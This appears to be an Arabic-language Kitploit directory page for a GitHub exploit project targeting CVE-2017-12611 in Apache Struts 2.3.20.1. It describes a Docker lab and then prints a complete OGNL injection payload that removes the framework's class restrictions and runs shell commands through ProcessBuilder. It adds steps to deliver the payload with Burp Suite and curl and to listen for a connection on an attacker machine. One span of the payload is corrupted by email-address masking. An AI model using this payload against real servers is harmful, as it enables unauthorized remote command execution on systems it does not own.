Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2017-12611_Exploit — مشروع RCE | Kitploit
أدوات/GitHubGitHub/zeynepsilao/cve-2017-12611_exploit
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقمختبرات وتدريب عملي
GitHubzeynepsilao/cve-2017-12611_exploit

CVE-2017-12611_Exploit

مشروع RCE

عرض المستودع
منذ 11 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

مشروع CVE-2017-12611

نظرة عامة:

هجوم تنفيذ الأوامر عن بُعد (RCE) ممكن باستخدام الحمولة المعطاة.

البيئة والأدوات

يسرد ما يلي البيئات والأدوات المستخدمة للاختبار والتحقق في مختبر شخصي معزول.

  • نظام التشغيل المضيف: Ubuntu 18.04.6
  • نظام المهاجم: Kali Linux
  • منصة الحاويات: Docker
  • حزمة التطبيق المستهدفة: Apache Struts 2.3.20.1
  • مكونات إضافية: Burp Suite

إعداد البيئة:

باستخدام الأمر التالي:

root@kitploit:~
docker compose up -d 

يمكنك تشغيل البيئة. بعد ذلك يمكنك رؤية صفحة إرسال من خلال زيارة http://<YOUR_IP>:8080/hello.action.

الحمولة:

%{(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='id').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}

من أجل تنفيذ هجوم RCE، من الضروري استخدام Burp Suite. أثناء استخدام Burp Suite، قم بإرسال الحمولة. بعد إرسال الحمولة، ابحث عن السجل الصحيح (POST) وحوّله إلى أمر curl. أخيرًا، افتح جهاز المهاجم واستمع على المنفذ بعد إرسال أمر curl من منفذ المستمع.

ملاحظات:

المناطق المحجوبة هي عناوين IP.

تنزيل الأداة